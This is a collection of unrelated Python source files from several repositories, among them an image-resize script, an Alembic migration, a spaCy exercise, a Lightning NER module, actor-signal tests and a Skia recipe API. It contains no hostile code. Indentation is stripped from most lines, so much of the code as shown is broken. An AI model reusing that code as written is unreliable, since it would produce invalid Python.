if arg['width'] and ori_w > arg['width']:
            widthRatio = float(arg['width']) / ori_w  # cast to float so the ratio keeps its fractional part
if arg['height'] and ori_h > arg['height']:
heightRatio = float(arg['height']) / ori_h
if widthRatio and heightRatio:
if widthRatio < heightRatio:
ratio = widthRatio
else:
ratio = heightRatio
if widthRatio and not heightRatio:
ratio = widthRatio
if heightRatio and not widthRatio:
ratio = heightRatio
newWidth = int(ori_w * ratio)
newHeight = int(ori_h * ratio)
else:
newWidth = ori_w
newHeight = ori_h
im.resize((newWidth, newHeight), image.ANTIALIAS).convert('RGB').save(arg['out_path'], quality=arg['quality'])
def clipResizeImg(**args):
args_key = {'path': '', 'out_path': '', 'width': '', 'height': '', 'quality': 75}
arg = {}
for key in args_key:
if key in args:
arg[key] = args[key]
im = image.open(arg['path'])
ori_w, ori_h = im.size
    dst_scale = float(arg['height']) / arg['width']  # target height-to-width ratio
width = ori_w
height = int(width * dst_scale)
x = 0
    y = (ori_h - height) // 3
    # crop
    box = (x, y, width + x, height + y)
    # The box can be read as: crop the image from coordinate (x, y) up to (width + x, height + y).
    # Note that PIL's crop method behaves quite differently from PHP's imagecopy.
newIm = im.crop(box)
im = None
    # scale down to the target width
ratio = float(arg['width']) / width
newWidth = int(width * ratio)
newHeight = int(height * ratio)
newIm.resize((newWidth, newHeight), image.ANTIALIAS).convert('RGB').save(arg['out_path'], quality=arg['quality'])
if __name__ == '__main__':
clipResizeImg(path='/home/xiaoc/2.jpeg', out_path='/home/xiaoc/2.out.jpeg', width=1220, height=604, quality=85)
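    # A purely proportional resize would look similar (hypothetical output path):
    # resizeImg(path='/home/xiaoc/2.jpeg', out_path='/home/xiaoc/2.small.jpeg', width=640, height=480, quality=85)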
|
app/backend/src/couchers/migrations/versions/62fcd41e4dcd_implement_signup_flow_v2.py
|
foormea/couchers
| 226 |
101955
|
"""Implement signup flow v2
Revision ID: <KEY>
Revises: 1c7784767710
Create Date: 2021-06-25 08:17:24.410658
"""
import geoalchemy2
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "1c7784767710"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"signup_flows",
sa.Column("id", sa.BigInteger(), nullable=False),
sa.Column("created", sa.DateTime(timezone=True), server_default=sa.text("now()"), nullable=False),
sa.Column("flow_token", sa.String(), nullable=False),
sa.Column("email_verified", sa.Boolean(), nullable=False),
sa.Column("email_sent", sa.Boolean(), nullable=False),
sa.Column("email_token", sa.String(), nullable=True),
sa.Column("email_token_expiry", sa.DateTime(timezone=True), nullable=True),
sa.Column("name", sa.String(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.LargeBinary(), nullable=True),
sa.Column("birthdate", sa.Date(), nullable=True),
sa.Column("gender", sa.String(), nullable=True),
sa.Column(
"hosting_status",
postgresql.ENUM("can_host", "maybe", "cant_host", name="hostingstatus", create_type=False),
nullable=True,
),
sa.Column("city", sa.String(), nullable=True),
sa.Column(
"geom",
geoalchemy2.types.Geometry(geometry_type="POINT", srid=4326, from_text="ST_GeomFromEWKT", name="geometry"),
nullable=True,
),
sa.Column("geom_radius", sa.Float(), nullable=True),
sa.Column("accepted_tos", sa.Integer(), nullable=True),
sa.Column("filled_feedback", sa.Boolean(), nullable=False),
sa.Column("ideas", sa.String(), nullable=True),
sa.Column("features", sa.String(), nullable=True),
sa.Column("experience", sa.String(), nullable=True),
sa.Column("contribute", sa.Enum("yes", "maybe", "no", name="contributeoption"), nullable=True),
sa.Column("contribute_ways", sa.ARRAY(sa.String()), nullable=True),
sa.Column("expertise", sa.String(), nullable=True),
sa.PrimaryKeyConstraint("id", name=op.f("pk_signup_flows")),
sa.UniqueConstraint("email", name=op.f("uq_signup_flows_email")),
sa.UniqueConstraint("flow_token", name=op.f("uq_signup_flows_flow_token")),
sa.UniqueConstraint("username", name=op.f("uq_signup_flows_username")),
)
op.create_table(
"contributor_forms",
sa.Column("id", sa.BigInteger(), nullable=False),
sa.Column("user_id", sa.BigInteger(), nullable=False),
sa.Column("ideas", sa.String(), nullable=True),
sa.Column("features", sa.String(), nullable=True),
sa.Column("experience", sa.String(), nullable=True),
sa.Column("contribute", sa.Enum("yes", "maybe", "no", name="contributeoption"), nullable=True),
sa.Column("contribute_ways", sa.ARRAY(sa.String()), nullable=True),
sa.Column("expertise", sa.String(), nullable=True),
sa.ForeignKeyConstraint(["user_id"], ["users.id"], name=op.f("fk_contributor_forms_user_id_users")),
sa.PrimaryKeyConstraint("id", name=op.f("pk_contributor_forms")),
)
op.create_index(op.f("ix_contributor_forms_user_id"), "contributor_forms", ["user_id"], unique=False)
op.drop_table("signup_tokens")
def downgrade():
op.create_table(
"signup_tokens",
sa.Column("token", sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column("email", sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column(
"created",
postgresql.TIMESTAMP(timezone=True),
server_default=sa.text("now()"),
autoincrement=False,
nullable=False,
),
sa.Column("expiry", postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint("token", name="pk_signup_tokens"),
)
op.drop_index(op.f("ix_contributor_forms_user_id"), table_name="contributor_forms")
op.drop_table("contributor_forms")
op.drop_table("signup_flows")
|
exercises/pt/solution_01_03_02.py
|
Jette16/spacy-course
| 2,085 |
101960
|
<gh_stars>1000+
# Import the English language class and create an nlp object
from spacy.lang.en import English
nlp = English()
# Process the text
doc = nlp("I like tree kangaroos and narwhals.")
# A slice of the Doc for "tree kangaroos"
tree_kangaroos = doc[2:4]
print(tree_kangaroos.text)
# A slice of the Doc for "tree kangaroos and narwhals" (without including the ".")
tree_kangaroos_and_narwhals = doc[2:6]
print(tree_kangaroos_and_narwhals.text)
|
server/workers/dataprocessing/src/streamgraph.py
|
chreman/Headstart
| 111 |
101965
|
<gh_stars>100-1000
import pandas as pd
import logging
import sys
import re
import numpy as np
from itertools import chain
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import NMF, LatentDirichletAllocation
formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
np.random.seed(42)
class Streamgraph(object):
def __init__(self, loglevel="INFO"):
self.logger = logging.getLogger(__name__)
self.logger.setLevel(loglevel)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
handler.setLevel(loglevel)
self.logger.addHandler(handler)
def tokenize(self, s):
#return re.split("; | - |, |: ", s)
return re.split("; ", s)
def get_streamgraph_data(self, metadata, query, n=12, method="count"):
metadata = pd.DataFrame.from_records(metadata)
df = metadata.copy()
df.year = pd.to_datetime(df.year).map(lambda x: x.replace(month=1, day=1))
df = df[df.subject.map(lambda x: x is not None)]
df.subject = df.subject.map(lambda x: [s.lower() for s in self.tokenize(x)] if isinstance(x, str) else "")
df = df[df.subject.map(lambda x: x != [])]
df["boundary_label"] = df.year
df = df.explode('subject')
df = df[df.subject != ""]
counts = self.get_counts(df)
boundaries = self.get_boundaries(df)
daterange = self.get_daterange(boundaries)
data = pd.merge(counts, boundaries, on='year')
top_n = self.get_top_n(metadata.copy(), query, n, method)
data = (data[data.subject.str.contains('|'.join(top_n), case=False)]
.sort_values("year")
.reset_index(drop=True))
sg_data = {}
sg_data["x"], sg_data["subject"] = self.build_sg_data(daterange, data, top_n)
return sg_data
@staticmethod
def get_x_axis(daterange):
return [str(x.year) for x in daterange]
@staticmethod
def get_daterange(boundaries):
daterange = pd.date_range(start=min(boundaries.year),
end=max(boundaries.year),
freq='AS')
if len(daterange) > 0:
return sorted(daterange)
else:
return sorted(pd.unique(boundaries.year))
@staticmethod
def get_stream_range(df):
stream_range = {
"min": min(df.year),
"max": max(df.year),
"range": max(df.year) - min(df.year)
}
return stream_range
@staticmethod
def get_counts(df):
counts = (df.groupby(["year", "subject"])
.agg({'subject': 'count', 'id': lambda x: ", ".join(x)}))
counts.rename({"subject": "counts"}, axis=1, inplace=True)
counts.reset_index(inplace=True)
return counts
@staticmethod
def get_boundaries(df):
boundaries = df[["boundary_label", "year"]].drop_duplicates()
return boundaries
def get_top_n(self, df, query, n, method):
df = df[df.subject.map(lambda x: len(x) > 2)]
corpus = df.subject.tolist()
        # stop words could also be set globally, e.g. stop_words='english'
tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2,
tokenizer=lambda x: self.tokenize(x),
lowercase=True,
stop_words=[query]
)
tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2,
tokenizer=lambda x: self.tokenize(x),
lowercase=True,
stop_words=[query]
)
if method == "count":
tf = tf_vectorizer.fit_transform(corpus)
counts = pd.DataFrame(tf.toarray(),
columns=tf_vectorizer.get_feature_names())
candidates = counts.sum().sort_values(ascending=False).index.tolist()
candidates = [c for c in candidates if len(c) > 2]
top_n = candidates[:n]
if method == "tfidf":
tfidf = tfidf_vectorizer.fit_transform(corpus)
weights = pd.DataFrame(tfidf.toarray(),
columns=tfidf_vectorizer.get_feature_names())
candidates = weights.sum().sort_values(ascending=False).index.tolist()
candidates = [c for c in candidates if len(c) > 2]
top_n = candidates[:n]
if method == "nmf":
tfidf = tfidf_vectorizer.fit_transform(corpus)
nmf = NMF(n_components=n,
alpha=.1, l1_ratio=.5, init='nndsvd',
random_state=42).fit(tfidf)
top_n = list(chain.from_iterable(
[self.get_top_words(t, tfidf_vectorizer.get_feature_names(), 1)
for t in nmf.components_]))
if method == "lda":
tf = tf_vectorizer.fit_transform(corpus)
lda = LatentDirichletAllocation(n_components=n, max_iter=20,
learning_method='batch',
learning_offset=50.,
random_state=42).fit(tf)
top_n = list(chain.from_iterable(
[self.get_top_words(t, tf_vectorizer.get_feature_names(), 1)
for t in lda.components_]))
return top_n
@staticmethod
def get_top_words(topic, feature_names, n):
indices = topic.argsort()[::-1]
words = [feature_names[i] for i in indices]
words = [w for w in words if len(w) > 2]
return words[:n]
def build_sg_data(self, daterange, data, top_n):
x = pd.DataFrame(daterange, columns=["year"])
temp = []
for item in top_n:
tmp = (pd.merge(data[data.subject.str.contains(item, case=False)], x,
left_on="year", right_on="year",
how="right")
.groupby("year")
.agg({"subject": "sum",
"counts": "sum",
"id": aggregate_ids,
"boundary_label": "max"})
.fillna({"counts": 0, "subject": item, "id": "NA"})
.sort_values("year"))
tmp["subject"] = item
tmp["counts"] = tmp["id"].map(lambda x: len(set(filter(lambda x: x!="NA", x.split(", ")))))
y = tmp.counts.astype(int).to_list()
            ids_timestep = tmp.id.map(lambda ids: list(set(filter(lambda i: i != "NA", ids.split(", "))))).tolist()
temp.append({"name": item, "y": y,
"ids_timestep": ids_timestep})
df = pd.DataFrame.from_records(temp)
df["name"] = df.name.apply(str.capitalize)
x, df = self.reduce_daterange(daterange, df)
df = df[df["ids_overall"].map(lambda x: len(x) != 0)]
return x, df.to_dict(orient="records")
def reduce_daterange(self, daterange, df):
x = self.get_x_axis(daterange)
yearly_sums = pd.DataFrame(df.y.to_list()).T.sum(axis=1)
yearly_sums_cum = yearly_sums.cumsum()
        # the 5% chosen here is an arbitrary value; it could also be higher (e.g. 10%) or lower
min_value = int(yearly_sums.sum() * 0.05)
start_index = yearly_sums_cum[yearly_sums_cum > min_value].index[0]
df.y = df.y.map(lambda x: x[start_index:])
df.ids_timestep = df.ids_timestep.map(lambda x: x[start_index:])
x = x[start_index:]
df["ids_overall"] = df.ids_timestep.map(lambda x: list(chain.from_iterable(x)))
return x, df
@staticmethod
def reduce_metadata_set(metadata, sg_data):
metadata = pd.read_json(metadata)
df = pd.DataFrame.from_records(sg_data["subject"])
all_ids = set(chain.from_iterable(df.ids_overall))
metadata = metadata[metadata.id.map(lambda x: x in all_ids)]
return metadata.to_json(orient="records")
def aggregate_ids(series):
try:
return ", ".join(pd.unique(series))
except Exception:
return "NA"
|
DjangoTutorial_v3.5/lesson1/task1/tests_subtask4.py
|
behzod/pycharm-courses
| 213 |
101972
|
from test_helper import run_common_tests, failed, passed, get_answer_placeholders, do_not_run_on_check
if __name__ == '__main__':
do_not_run_on_check()
run_common_tests()
|
CalibTracker/SiStripESProducers/python/SiStripGainESProducer_cfi.py
|
ckamtsikis/cmssw
| 852 |
101996
|
import FWCore.ParameterSet.Config as cms
siStripGainESProducer = cms.ESProducer("SiStripGainESProducer",
appendToDataLabel = cms.string(''),
printDebug = cms.untracked.bool(False),
AutomaticNormalization = cms.bool(False),
APVGain = cms.VPSet(
cms.PSet(
Record = cms.string('SiStripApvGainRcd'),
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.)
),
cms.PSet(
Record = cms.string('SiStripApvGain2Rcd'),
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.)
)
)
)
|
src/lightning_classes/lightning_ner.py
|
mohamedbakrey12/prpjectINDeepLearning
| 122 |
101999
|
from typing import Dict
import numpy as np
import pytorch_lightning as pl
import torch
from omegaconf import DictConfig
from src.utils.technical_utils import load_obj
class LitNER(pl.LightningModule):
def __init__(self, cfg: DictConfig, tag_to_idx: Dict):
super(LitNER, self).__init__()
self.cfg = cfg
self.tag_to_idx = tag_to_idx
self.model = load_obj(cfg.model.class_name)(
embeddings_dim=cfg.datamodule.embeddings_dim, tag_to_idx=tag_to_idx, **cfg.model.params
)
self.metrics = torch.nn.ModuleDict(
{
self.cfg.metric.metric.metric_name: load_obj(self.cfg.metric.metric.class_name)(
**cfg.metric.metric.params
)
}
)
if 'other_metrics' in self.cfg.metric.keys():
for metric in self.cfg.metric.other_metrics:
self.metrics.update({metric.metric_name: load_obj(metric.class_name)(**metric.params)})
def forward(self, x, lens, *args, **kwargs):
return self.model(x, lens)
def configure_optimizers(self):
optimizer = load_obj(self.cfg.optimizer.class_name)(self.model.parameters(), **self.cfg.optimizer.params)
scheduler = load_obj(self.cfg.scheduler.class_name)(optimizer, **self.cfg.scheduler.params)
return (
[optimizer],
[{'scheduler': scheduler, 'interval': self.cfg.scheduler.step, 'monitor': self.cfg.scheduler.monitor}],
)
def training_step(self, batch, batch_idx):
embeds, lens, labels = batch
        # transform tokens to embeddings (self._vectorizer is assumed to be attached
        # to the module externally, e.g. by the datamodule, before training starts)
        embeds = self._vectorizer(embeds)
score, tag_seq, loss = self.model(embeds, lens, labels)
labels = labels.flatten()
labels = labels[labels != self.tag_to_idx['PAD']]
self.log('train_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)
for metric in self.metrics:
score = self.metrics[metric](tag_seq, labels)
self.log(f'train_{metric}', score, on_step=True, on_epoch=True, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_idx):
embeds, lens, labels = batch
embeds = self._vectorizer(embeds)
score, tag_seq, loss = self.model(embeds, lens, labels)
labels = labels.flatten()
labels = labels[labels != self.tag_to_idx['PAD']]
self.log('valid_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)
for metric in self.metrics:
score = self.metrics[metric](tag_seq, labels)
self.log(f'valid_{metric}', score, on_step=True, on_epoch=True, prog_bar=True, logger=True)
|
ex/parser/scanner_command_unabbreviate.py
|
my-personal-forks/Vintageous
| 1,146 |
102015
|
from .state import EOF
from .tokens import TokenEof
from .tokens_base import TOKEN_COMMAND_UNABBREVIATE
from .tokens_base import TokenOfCommand
from Vintageous import ex
@ex.command('unabbreviate', 'una')
class TokenUnabbreviate(TokenOfCommand):
def __init__(self, params, *args, **kwargs):
super().__init__(params,
TOKEN_COMMAND_UNABBREVIATE,
'unabbreviate', *args, **kwargs)
self.target_command = 'ex_unabbreviate'
@property
def short(self):
return self.params['lhs']
def scan_command_unabbreviate(state):
params = {
'lhs': None
}
m = state.expect_match(r'\s+(?P<lhs>.+?)\s*$')
params.update(m.groupdict())
return None, [TokenUnabbreviate(params), TokenEof()]
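# Parsing sketch: for an ex command such as ':unabbreviate foo', the scanner state
# holds ' foo' after the command name, the regex above captures lhs='foo', and the
# result is (None, [TokenUnabbreviate({'lhs': 'foo'}), TokenEof()]).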
|
auctioning_platform/auctions/auctions/application/use_cases/ending_auction.py
|
nhdinh/smp-modulith
| 299 |
102028
|
<reponame>nhdinh/smp-modulith
from dataclasses import dataclass
from auctions.application.repositories import AuctionsRepository
from auctions.domain.value_objects import AuctionId
@dataclass
class EndingAuctionInputDto:
auction_id: AuctionId
class EndingAuction:
def __init__(self, auctions_repo: AuctionsRepository) -> None:
self.auctions_repo = auctions_repo
def execute(self, input_dto: EndingAuctionInputDto) -> None:
auction = self.auctions_repo.get(input_dto.auction_id)
# ???
self.auctions_repo.save(auction)
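# Usage sketch (the repository instance is assumed to be supplied by the caller):
#   use_case = EndingAuction(auctions_repo)
#   use_case.execute(EndingAuctionInputDto(auction_id=auction_id))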
|
config/custom_components/ziggonext/const.py
|
LRvdLinden/homeassistant-config
| 288 |
102064
|
<filename>config/custom_components/ziggonext/const.py<gh_stars>100-1000
"""Constants for the Ziggo Mediabox Next integration."""
ZIGGO_API = "ziggo_api"
CONF_COUNTRY_CODE = "country_code"
RECORD = "record"
REWIND = "rewind"
FAST_FORWARD = "fast_forward"
|
thespian/test/test_actorSignals.py
|
dendron2000/Thespian
| 210 |
102094
|
import logging
import time, datetime
from thespian.actors import *
from thespian.test import *
import signal
import os
import pytest
class KillMeActor(Actor):
def receiveMessage(self, msg, sender):
logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
self.send(sender, os.getpid())
class ParentActor(Actor):
def receiveMessage(self, msg, sender):
if msg == 'child':
self.send(self.createActor(ChildActor), sender)
if msg == 'hello':
if not hasattr(self, 'rspmsg'):
self.rspmsg = 'world'
self.send(sender, self.rspmsg)
if isinstance(msg, ChildActorExited):
self.rspmsg = 'goodbye'
class ChildActor(Actor):
def receiveMessage(self, msg, sender):
if isinstance(msg, ActorAddress):
self.send(msg, os.getpid())
smallwait = datetime.timedelta(milliseconds=350)
@pytest.fixture(params=[
# Non-deadly
'signal.SIGCONT-world',
# 'signal.SIGINT-world',
# 'signal.SIGUSR1-world',
# 'signal.SIGUSR2-world',
# 'signal.SIGHUP-world',
# # Deadly
# 'signal.SIGTERM-goodbye',
# 'signal.SIGQUIT-goodbye',
# 'signal.SIGABRT-goodbye',
# 'signal.SIGKILL-goodbye',
])
def testSignal(request):
return request.param
class TestFuncSafeActorSignals(object):
def testCreateActorSystem(self, asys):
pass
def testSimpleActor(self, asys):
killme = asys.createActor(KillMeActor)
def testSigCont(self, asys):
killme = asys.createActor(KillMeActor)
killme_pid = asys.ask(killme, 'pid?', smallwait)
assert killme_pid # not 0 or None
os.kill(killme_pid, signal.SIGCONT)
assert killme_pid == asys.ask(killme, 'pid again?', smallwait)
def testChildSigCont(self, asys):
parent = asys.createActor(ParentActor)
assert 'world' == asys.ask(parent, 'hello', smallwait)
child_pid = asys.ask(parent, 'child', smallwait*3)
assert child_pid # not 0 or None
os.kill(child_pid, signal.SIGCONT)
assert 'world' == asys.ask(parent, 'hello', smallwait)
# n.b. Cannot test unsafe signals with the simple actor system because
# the signals affect the testing process; often causing it to exit.
class TestFuncMultiProcActorSignals(object):
def test_signal(self, asys, testSignal):
if 'proc' not in asys.base_name:
pytest.skip('Cannot send signals to primary testing process')
signame, response = testSignal.split('-')
killme = asys.createActor(KillMeActor)
killme_pid = asys.ask(killme, 'pid?', smallwait)
assert killme_pid # not 0 or None
os.kill(killme_pid, eval(signame))
time.sleep(0.2) # allow signal to be delivered
r = asys.ask(killme, 'pid again?', smallwait)
assert (killme_pid if response == 'world' else None) == r
def testChildSig(self, testSignal, asys):
if 'proc' not in asys.base_name:
pytest.skip('Cannot send signals to primary testing process')
signame, response = testSignal.split('-')
parent = asys.createActor(ParentActor)
assert 'world' == asys.ask(parent, 'hello', smallwait)
child_pid = asys.ask(parent, 'child', smallwait*3)
assert child_pid # not 0 or None
os.kill(child_pid, eval(signame))
# Child is not killed and continues running
time.sleep(0.02) # allow signal to be delivered
assert response == asys.ask(parent, 'hello', smallwait)
|
lib/__init__.py
|
uwitec/LEHome
| 151 |
102106
|
import command, speech, sound, model, helper
|
tests/test_managers_otp.py
|
aphex3k/specter-desktop
| 683 |
102107
|
<reponame>aphex3k/specter-desktop
import os
from cryptoadvance.specter.managers.otp_manager import OtpManager
import time
def test_OtpManager(empty_data_folder):
# A OtpManager manages Otp, one-time-passwords
# via json-files in an empty data folder
otpm = OtpManager(data_folder=empty_data_folder)
assert os.path.isfile(os.path.join(empty_data_folder, "otps.json"))
# initialization will load from the folder but it's empty at first
assert otpm.data == {} # but you shouldn't access data directly anyway
# an otp looks like this:
an_otp = {
"otp": "aOxO42IeM-aRB4WjBIAQRA",
"created_at": 1618491877.546648,
"expiry": 1617495477.546648,
}
otpm.add_new_user_otp(an_otp)
yet_another_otp = {
"otp": "nPfouONJmUgS642MitqPkg",
"created_at": time.time(),
"expiry": time.time() + 60 * 60, # plus 1 h
}
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
otpm.add_new_user_otp(yet_another_otp)
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
assert otpm.validate_new_user_otp(yet_another_otp["otp"]) == True
otpm.remove_new_user_otp(an_otp["otp"])
# If it doesn't exist, False as well
assert otpm.validate_new_user_otp(an_otp["otp"]) == False
# anything gets you False
assert otpm.validate_new_user_otp("anything") == False
|
env/lib/python3.8/site-packages/_plotly_utils/importers.py
|
acrucetta/Chicago_COVI_WebApp
| 11,750 |
102142
|
<filename>env/lib/python3.8/site-packages/_plotly_utils/importers.py
import importlib
def relative_import(parent_name, rel_modules=(), rel_classes=()):
"""
Helper function to import submodules lazily in Python 3.7+
Parameters
----------
rel_modules: list of str
list of submodules to import, of the form .submodule
rel_classes: list of str
list of submodule classes/variables to import, of the form ._submodule.Foo
Returns
-------
tuple
Tuple that should be assigned to __all__, __getattr__ in the caller
"""
module_names = {rel_module.split(".")[-1]: rel_module for rel_module in rel_modules}
class_names = {rel_path.split(".")[-1]: rel_path for rel_path in rel_classes}
def __getattr__(import_name):
# In Python 3.7+, lazy import submodules
# Check for submodule
if import_name in module_names:
rel_import = module_names[import_name]
return importlib.import_module(rel_import, parent_name)
# Check for submodule class
if import_name in class_names:
rel_path_parts = class_names[import_name].split(".")
rel_module = ".".join(rel_path_parts[:-1])
class_name = import_name
class_module = importlib.import_module(rel_module, parent_name)
return getattr(class_module, class_name)
raise AttributeError(
"module {__name__!r} has no attribute {name!r}".format(
name=import_name, __name__=parent_name
)
)
__all__ = list(module_names) + list(class_names)
def __dir__():
return __all__
return __all__, __getattr__, __dir__
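# Typical usage sketch from a package __init__.py (the module and class names are
# illustrative, not taken from any particular package):
#   __all__, __getattr__, __dir__ = relative_import(
#       __name__,
#       rel_modules=[".scatter"],
#       rel_classes=["._figure.Figure"],
#   )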
|
infra/bots/recipe_modules/run/api.py
|
pospx/external_skia
| 2,151 |
102166
|
<filename>infra/bots/recipe_modules/run/api.py
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0201
from recipe_engine import recipe_api
TEST_DEFAULT_ASSET_VERSION = '42'
class SkiaStepApi(recipe_api.RecipeApi):
def __init__(self, *args, **kwargs):
"""Initialize the recipe module."""
super(SkiaStepApi, self).__init__(*args, **kwargs)
self._already_ran = {}
self._ccache = None
self._checked_for_ccache = False
self._failed = []
def check_failure(self):
"""Raise an exception if any step failed."""
if self._failed:
raise self.m.step.StepFailure('Failed build steps: %s' %
', '.join([f.name for f in self._failed]))
@property
def failed_steps(self):
return self._failed[:]
def run_once(self, fn, *args, **kwargs):
if not fn.__name__ in self._already_ran:
self._already_ran[fn.__name__] = fn(*args, **kwargs)
return self._already_ran[fn.__name__]
def readfile(self, filename, *args, **kwargs):
"""Convenience function for reading files."""
name = kwargs.pop('name', 'read %s' % self.m.path.basename(filename))
return self.m.file.read_text(name, filename, *args, **kwargs)
def writefile(self, filename, contents):
"""Convenience function for writing files."""
return self.m.file.write_text('write %s' % self.m.path.basename(filename),
filename, contents)
def rmtree(self, path):
"""Wrapper around api.file.rmtree."""
self.m.file.rmtree('rmtree %s' % self.m.path.basename(path), path)
def asset_version(self, asset_name, skia_dir, test_data=None):
"""Return the contents of VERSION for the given asset as a string.
If test_data is not specified, reads the property
'test_<asset_name>_version' or if not present, uses
TEST_DEFAULT_ASSET_VERSION."""
version_file = skia_dir.join(
'infra', 'bots', 'assets', asset_name, 'VERSION')
if not test_data:
test_data = self.m.properties.get(
'test_%s_version' % asset_name, TEST_DEFAULT_ASSET_VERSION)
return self.m.file.read_text('Get %s VERSION' % asset_name,
version_file,
test_data=test_data).rstrip()
def __call__(self, steptype, name, abort_on_failure=True,
fail_build_on_failure=True, **kwargs):
"""Run a step. If it fails, keep going but mark the build status failed."""
try:
with self.m.env(self.m.vars.default_env):
return steptype(name=name, **kwargs)
except self.m.step.StepFailure as e:
if fail_build_on_failure:
self._failed.append(e)
if abort_on_failure:
raise
def with_retry(self, steptype, name, attempts, between_attempts_fn=None,
abort_on_failure=True, fail_build_on_failure=True, **kwargs):
for attempt in xrange(attempts):
step_name = name
if attempt > 0:
step_name += ' (attempt %d)' % (attempt + 1)
try:
res = self(steptype, name=step_name, abort_on_failure=True,
fail_build_on_failure=fail_build_on_failure, **kwargs)
if attempt > 0 and fail_build_on_failure:
del self._failed[-attempt:]
return res
except self.m.step.StepFailure:
if attempt == attempts - 1:
if abort_on_failure:
raise
elif between_attempts_fn:
between_attempts_fn(attempt+1)
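# Usage sketch (step name and kwargs are illustrative): run a step with up to three
# attempts, marking the build failed only if every attempt fails.
#   api.run.with_retry(api.step, 'flaky step', 3,
#                      cmd=['python', 'do_thing.py'])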
|
tests/conftest.py
|
zenoone/deepqmc
| 224 |
102211
|
<filename>tests/conftest.py
import torch
torch.manual_seed(0)
|
cftracker/config/cn_config.py
|
Existever/PyCFTrackers
| 231 |
102217
|
<gh_stars>100-1000
class CNConfig:
interp_factor = 0.075
sigma = 0.2
    lambda_ = 0.01
    output_sigma_factor = 1. / 16
    padding = 1
cn_type = 'pyECO'
|
tests/gdb/print_symbol.py
|
cohortfsllc/cohort-cocl2-sandbox
| 2,151 |
102229
|
<gh_stars>1000+
# -*- python -*-
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import gdb_test
class PrintSymbolTest(gdb_test.GdbTest):
def test_print_symbol(self):
self.gdb.Command('break set_global_var')
self.gdb.ResumeAndExpectStop('continue', 'breakpoint-hit')
self.assertEquals(self.gdb.Eval('global_var'), '2')
self.assertEquals(self.gdb.Eval('arg'), '1')
self.gdb.ResumeAndExpectStop('finish', 'function-finished')
self.assertEquals(self.gdb.Eval('global_var'), '1')
self.assertEquals(self.gdb.Eval('local_var'), '3')
if __name__ == '__main__':
gdb_test.Main()
|